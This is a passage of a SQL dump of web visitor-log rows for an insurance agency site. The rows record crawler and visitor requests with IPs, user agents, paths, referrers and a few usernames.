aac6e297583d054026385059','1460005496','13.90.208.223','13.90.208.223','/case-status','semanticbot','','',0,'','','','','','','','','','3','0',0),(14231,'0b_a1422989aac6e297583d054026385059','1460005505','13.90.208.223','13.90.208.223','/case-status/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14232,'0b_a1422989aac6e297583d054026385059','1460005515','13.90.208.223','13.90.208.223','/forms','semanticbot','','',0,'','','','','','','','','','3','0',0),(14235,'0b_a1422989aac6e297583d054026385059','1460005525','13.90.208.223','13.90.208.223','/forms/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14237,'0b_a1422989aac6e297583d054026385059','1460005536','13.90.208.223','13.90.208.223','/igo','semanticbot','','',0,'','','','','','','','','','3','0',0),(14240,'0b_a1422989aac6e297583d054026385059','1460005546','13.90.208.223','13.90.208.223','/igo/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14243,'0b_a1422989aac6e297583d054026385059','1460005556','13.90.208.223','13.90.208.223','/term-quotes','semanticbot','','',0,'','','','','','','','','','3','0',0),(14244,'0b_a1422989aac6e297583d054026385059','1460005565','13.90.208.223','13.90.208.223','/term-quotes/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14246,'0b_a1422989aac6e297583d054026385059','1460005575','13.90.208.223','13.90.208.223','/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14247,'0b_a1422989aac6e297583d054026385059','1460005585','13.90.208.223','13.90.208.223','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product','semanticbot','','',0,'','','','','','','','','','3','0',0),(14249,'0b_a1422989aac6e297583d054026385059','1460005595','13.90.208.223','13.90.208.223','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14250,'0b_a1422989aac6e297583d054026385059','1460005607','13.90.208.223','13.90.208.223','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target','semanticbot','','',0,'','','','','','','','','','3','0',0),(14252,'0b_a1422989aac6e297583d054026385059','1460005616','13.90.208.223','13.90.208.223','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14255,'0b_a1422989aac6e297583d054026385059','1460005626','13.90.208.223','13.90.208.223','/aig-releases-new-term-rates-and-re-enters-ny','semanticbot','','',0,'','','','','','','','','','3','0',0),(14258,'0b_a1422989aac6e297583d054026385059','1460005636','13.90.208.223','13.90.208.223','/aig-releases-new-term-rates-and-re-enters-ny/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14261,'0b_a1422989aac6e297583d054026385059','1460005645','13.90.208.223','13.90.208.223','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline','semanticbot','','',0,'','','','','','','','','','3','0',0),(14262,'0b_a1422989aac6e297583d054026385059','1460005655','13.90.208.223','13.90.208.223','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14264,'0b_a1422989aac6e297583d054026385059','1460005666','13.90.208.223','13.90.208.223','/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14267,'0b_a1422989aac6e297583d054026385059','1460005677','13.90.208.223','13.90.208.223','/?page_id=171?a=pwdreset','semanticbot','','',0,'','','','','','','','','','3','0',0),(14270,'0b_a1422989aac6e297583d054026385059','1460005687','13.90.208.223','13.90.208.223','/?page_id=169','semanticbot','','',0,'','','','','','','','','','3','0',0),(14271,'0b_a1422989aac6e297583d054026385059','1460005697','13.90.208.223','13.90.208.223','/register/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14273,'0b_a1422989aac6e297583d054026385059','1460005707','13.90.208.223','13.90.208.223','/meet-the-eib-team','semanticbot','','',0,'','','','','','','','','','3','0',0),(14274,'0b_a1422989aac6e297583d054026385059','1460005716','13.90.208.223','13.90.208.223','/meet-the-eib-team/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14276,'0b_a1422989aac6e297583d054026385059','1460005726','13.90.208.223','13.90.208.223','/members','semanticbot','','',0,'','','','','','','','','','3','0',0),(14279,'0b_a1422989aac6e297583d054026385059','1460005735','13.90.208.223','13.90.208.223','/members/','semanticbot','','',0,'','','','','','','','','','3','0',0),(14280,'0b_f5e2a8680cfb197a90c1d4525c0a2f6c','1460006030','31.184.238.200','31.184.238.200','/fuckyeh','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://www.empireins.com/fuckyeh','',0,'WinXP','IE 6','','','','','','','','0','0',0),(14282,'0b_272a8e1797d5286b3eb0558933d49d6c','1460006212','104.236.222.79','104.236.222.79','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0','','',0,'Win7 x64','Firefox 33','','','','','','','','0','0',0),(14285,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006513','51.254.32.82','82.ip-51-254-32.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14288,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006515','51.254.32.82','82.ip-51-254-32.eu','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14289,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006516','51.254.32.82','82.ip-51-254-32.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14291,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006518','51.254.32.82','82.ip-51-254-32.eu','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14292,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006521','51.254.32.82','82.ip-51-254-32.eu','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14295,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006525','51.254.32.82','82.ip-51-254-32.eu','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14297,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006529','51.254.32.82','82.ip-51-254-32.eu','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14300,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006533','51.254.32.82','82.ip-51-254-32.eu','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14303,'0b_3b602d83a3ab68cd6a5111009f4de8fc','1460006535','51.254.32.82','82.ip-51-254-32.eu','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(14306,'0b_7d113980552cfd93635d0908978188d6','1460006685','198.144.151.116','convinces.tnmail35.pw','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','pw','','','','','','','0','0',0),(14309,'0b_4e5590ca64001779ef18fa9b9e8fa723','1460007046','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(14310,'0b_2ae11f974ff7ab78677fb37ec1825a07','1460007085','144.76.80.151','static.151.80.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; .NET4.0E; .NET4.0C; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729)','','',0,'Win8','IE 10','de','','','Unknown Spider','','','','0','0',0),(14312,'0b_e5f071e270bc5ba789055e513bfabb90','1460007086','88.198.22.8','static.88-198-22-8.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729; .NET4.0C; .NET CLR 3.5.30729; .NET4.0E)','','',0,'WinVista','IE 9','de','','','Unknown Spider','','','','0','0',0),(14313,'0b_de4cb03a95fd91e40fcd58827aa43ea2','1460007170','123.125.71.70','baiduspider-123-125-71-70.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(14316,'0b_252a6add4c8e15fe48a769bbeeda86f8','1460007258','123.125.71.110','baiduspider-123-125-71-110.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(14318,'0b_de4cb03a95fd91e40fcd58827aa43ea2','1460007259','123.125.71.90','baiduspider-123-125-71-90.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(14319,'0b_74c0423375442f16e6452bbd54082e3a','1460010902','13.92.254.41','13.92.254.41','/','semanticbot','','',0,'','','us','','','','','','','0','0',0),(14322,'0b_de2222b3e4c10af6a903d0a5ee359d81','1460011390','134.249.55.71','134-249-55-71-broadband.kyivstar.net','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(14325,'0b_b3ca9ef45fbe8efd6ae19634dc862a6b','1460012282','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(14328,'0b_4dc5d2867716a3c6039f200407b02fb6','1460013255','54.160.76.197','ec2-54-160-76-197.compute-1.amazonaws.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(14331,'0b_4dc5d2867716a3c6039f200407b02fb6','1460013256','54.160.76.197','ec2-54-160-76-197.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','http://www.empireins.com/','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(14333,'0b_92b70b2ce5295ba5cf0c0f6fbae40653','1460013258','54.160.76.197','ec2-54-160-76-197.compute-1.amazonaws.com','/robots.txt','Python-urllib/1.17','','',0,'','','','','','Python-urllib','','','','0','0',0),(14334,'0b_4dc5d2867716a3c6039f200407b02fb6','1460013258','54.160.76.197','ec2-54-160-76-197.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(14336,'0b_4dc5d2867716a3c6039f200407b02fb6','1460013259','54.160.76.197','ec2-54-160-76-197.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2','','',0,'Linux','Qt 4','us','','','','','','','0','0',0),(14337,'0b_744e9ee0e777f8bdf2b5f3aee95b7e9a','1460017943','40.77.167.77','msnbot-40-77-167-77.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14340,'0b_482287810d6f343c17355a7a8aef6a04','1460024930','52.71.64.37','ec2-52-71-64-37.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31','','',0,'MacOSX','Chrome 26','','','','','','','','0','0',0),(14343,'0b_5e312b1398f273eafdc8a2982907e398','1460025678','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(14345,'0b_5e312b1398f273eafdc8a2982907e398','1460025680','144.76.93.46','static.46.93.76.144.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(14348,'0b_c7ae6be6a18318672348a0b4548c3afd','1460026861','207.46.13.19','msnbot-207-46-13-19.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(14349,'0b_1bc966a9b64fd47fd9b369bba8ee2727','1460029850','144.76.93.46','static.46.93.76.144.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(14352,'0b_1bc966a9b64fd47fd9b369bba8ee2727','1460029852','144.76.93.46','static.46.93.76.144.clients.your-server.de','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(14355,'0b_1bc966a9b64fd47fd9b369bba8ee2727','1460029854','144.76.93.46','static.46.93.76.144.clients.your-server.de','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','3','0',0),(14357,'0b_8e5abf7d8637e14211afa2965ee6514a','1460033187','52.0.3.61','ec2-52-0-3-61.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b11pre) Gecko/20110128 Firefox/4.0b11pr','','',0,'Win7 x64','Firefox 4','','','','','','','','0','0',0),(14358,'0b_a604011b8e5d1a4fd83454b6e148b89d','1460033219','51.254.143.239','239.ip-51-254-143.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(14360,'0b_a604011b8e5d1a4fd83454b6e148b89d','1460033222','51.254.143.239','239.ip-51-254-143.eu','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(14361,'0b_a604011b8e5d1a4fd83454b6e148b89d','1460033226','51.254.143.239','239.ip-51-254-143.eu','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(14364,'0b_768a979ae4116ffbfd19c8324a8b3e53','1460033228','192.166.218.214','192-166-218-214.arpa.teredo.pl','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','pl','','','MJ12bot','','','','0','0',0),(14366,'0b_a604011b8e5d1a4fd83454b6e148b89d','1460033229','51.254.143.239','239.ip-51-254-143.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','3','0',0),(14367,'0b_768a979ae4116ffbfd19c8324a8b3e53','1460033230','192.166.218.214','192-166-218-214.arpa.teredo.pl','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','pl','','','MJ12bot','','','','0','0',0),(14370,'0b_768a979ae4116ffbfd19c8324a8b3e53','1460033243','192.166.218.214','192-166-218-214.arpa.teredo.pl','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','pl','','','MJ12bot','','','','0','0',0),(14372,'0b_2ee3b302dd248cbbf7f534af4977b4da','1460033479','177.180.214.86','b1b4d656.virtua.com.br','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','http://buttons-for-website.com','',0,'Win7','Chrome 36','br','','','','','','','2','0',0),(14373,'0b_2ee3b302dd248cbbf7f534af4977b4da','1460033482','177.180.214.86','b1b4d656.virtua.com.br','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 36','br','','','','','','','2','0',0),(14375,'0b_022385191e89539ea03dd9f5575b518f','1460034525','172.56.7.84','172.56.7.84','/discl.htm','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G900T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','','',0,'Android 5','SamsungBrowser 2','us','360 x 640','','','','','','0','0',0),(14378,'0b_022385191e89539ea03dd9f5575b518f','1460034572','172.56.7.84','172.56.7.84','/','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G900T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','http://www.empireins.com/discl.htm','',0,'Android 5','SamsungBrowser 2','us','360 x 640','','','','','','0','0',0),(14381,'0b_022385191e89539ea03dd9f5575b518f','1460034584','172.56.7.84','172.56.7.84','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G900T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 2','us','360 x 640','','','','','','0','0',0),(14382,'0b_022385191e89539ea03dd9f5575b518f','1460034612','172.56.7.84','172.56.7.84','/contact/','Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-G900T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','SamsungBrowser 2','us','360 x 640','','','','','','0','51',0),(14384,'0b_689a9cab6543ab4f98464b44b8733d33','1460034929','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(14385,'0b_689a9cab6543ab4f98464b44b8733d33','1460034930','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(14388,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035021','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14390,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035022','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14393,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035023','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14396,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035024','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(14399,'0b_6e31989f6b98c0c013fb4c686022016f','1460035088','141.255.166.214','141.255.166.214','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista','Firefox 15','ua','','','','','','','0','0',0),(14400,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035712','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14403,'0b_6f2f167fc56f49a6f716d4d6a936c16f','1460035766','66.249.64.34','crawl-66-249-64-34.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14406,'0b_6f2f167fc56f49a6f716d4d6a936c16f','1460035771','66.249.64.24','crawl-66-249-64-24.googlebot.com','/licensing-contracting/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(14409,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035822','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14412,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035830','108.58.88.178','ool-6c3a58b2.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14415,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035844','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/life-product-search/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14418,'0b_7745f498921e3adbf6b39cbd192d5dac','1460035854','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14420,'0b_7745f498921e3adbf6b39cbd192d5dac','1460037082','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(14423,'0b_4808cffacd38e8aea48f1543eb1f5b53','1460037105','13.92.248.218','13.92.248.218','/','semanticbot','','',0,'','','us','','','','','','','0','0',0),(14426,'0b_21f2d710645e0c6d59819b8efb30a482','1460039491','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14427,'0b_21f2d710645e0c6d59819b8efb30a482','1460039493','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(14429,'0b_9ac257aff146b2e68de2c2a9b6199a17','1460040833','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(14432,'0b_9ac257aff146b2e68de2c2a9b6199a17','1460040835','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(14435,'0b_9ac257aff146b2e68de2c2a9b6199a17','1460040838','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(14438,'0b_9ac257aff146b2e68de2c2a9b6199a17','1460040848','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1600 x 900','','','','akepecs','','0','51',0),(14441,'0b_9ac257aff146b2e68de2c2a9b6199a17','1460040926','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','akepecs','','0','51',0),(14442,'0b_9ac257aff146b2e68de2c2a9b6199a17','1460040926','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','akepecs','','0','0',0),(14445,'0b_9ac257aff146b2e68de2c2a9b6199a17','1460040930','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','akepecs','','0','51',0),(14448,'0b_9ac257aff146b2e68de2c2a9b6199a17','1460040936','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1600 x 900','','','','akepecs','','0','51',0),(14451,'0b_94c177a058fd1afe900041a22b3753c7','1460041629','184.154.36.163','scan21.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14454,'0b_94c177a058fd1afe900041a22b3753c7','1460041632','184.154.36.163','scan21.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14456,'0b_94c177a058fd1afe900041a22b3753c7','1460041636','184.154.36.163','scan21.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14459,'0b_94c177a058fd1afe900041a22b3753c7','1460041639','184.154.36.163','scan21.sitelock.com','/forms/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14462,'0b_94c177a058fd1afe900041a22b3753c7','1460041642','184.154.36.163','scan21.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(14465,'0b_d268122b66812b2aae79b42f207b1a1b','1460042583','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1920 x 